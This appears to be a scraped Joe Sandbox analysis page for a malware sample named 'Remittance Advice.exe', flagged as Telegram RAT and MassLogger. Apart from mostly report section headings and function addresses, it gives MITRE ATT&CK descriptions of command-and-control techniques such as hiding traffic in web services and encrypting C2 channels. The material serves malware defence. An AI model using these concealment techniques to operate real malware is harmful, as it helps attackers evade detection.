Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Remittance Advice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Remittance Advice.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Remittance Advice.exe

Function 030ED530 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
threadCOMMON

Function 030ED540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 030EB298 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Function 030E590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 030E449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 075411A8 Relevance: 1.6, APIs: 1, Instructions: 76
threadCOMMON

Function 07541FC0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 07541FD0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 030ED788 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 0754114C Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Function 009EC168 Relevance: 2.0, APIs: 1, Instructions: 501
COMMON

Function 009E4F08 Relevance: .3, Instructions: 268
COMMON

Function 009EC76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre